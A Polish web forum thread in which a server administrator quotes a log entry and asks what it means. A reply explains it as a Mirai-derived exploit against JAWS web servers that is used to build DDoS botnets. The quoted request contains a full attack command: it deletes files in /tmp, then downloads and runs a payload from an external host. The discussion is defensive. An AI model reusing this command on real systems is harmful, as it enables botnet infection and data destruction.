![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 328 Pomógł: 3 Dołączył: 10.07.2016 Skąd: UK-raine Ostrzeżenie: (0%) ![]() ![]() |
Hel-lo wszystkim
Jeśli macie a pewnie niektórzy maja z pewnościa .. co to może być ? GET /shell?cd+/tmp;rm+-rf+*;wget+ kreekxassa.ml/jaws;sh+/tmp/jaws" 400 0 "-" "-" wyglada na formę ataku ale moje doświadczenie w temacie "server security" jest stosunkowo niewielkie. Faktem jest, że po tym mój serwer przez kilk aminut był całkowicie martwy .... Macie jakieś wytłumaczenie ? Pozdrówka phpamator Ten post edytował phpamator 11.07.2022, 09:18:54 |
|
|
![]() |
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 324 Pomógł: 52 Dołączył: 18.02.2008 Ostrzeżenie: (0%) ![]() ![]() |
Podpytałem trochę naszych adminów bo już gdzieś mi się podobny link obił o oczy. To działanie exploitów oparte na kodzie Mirai, który w w Twoim przypadku chce dokonać nieautoryzowanego polecenia powłoki przez serwer Webserwer JAWS. Generalnie ataki tych exploitów (i pochodnych Mirai) zostały stworzone pierwotnie do ataków na IOT (internet rzeczy) w celu zainfekowania ich jak najwięcej ( w sensie np. ruterów czy serwerów sprzętowych) i utworzenia z nich sieci zdalnych botnetów do ataków na dużą skalę.
Pochodne Mirai niestety ciągle ewaluowują i np. któraś wersja Mirai wykorzystuje exploita Spring4Shell do infekowania podatnych serwerów internetowych i rekrutowania ich do ataków DDoS. Jest tego syfu znacznie więcej, tworząc kampanie i zestawy exploitów: Omni, Okai, Hakane itp. Warto o tym poczytać. |
|
|
![]() ![]() |
![]() |
Aktualny czas: 13.10.2025 - 23:54 |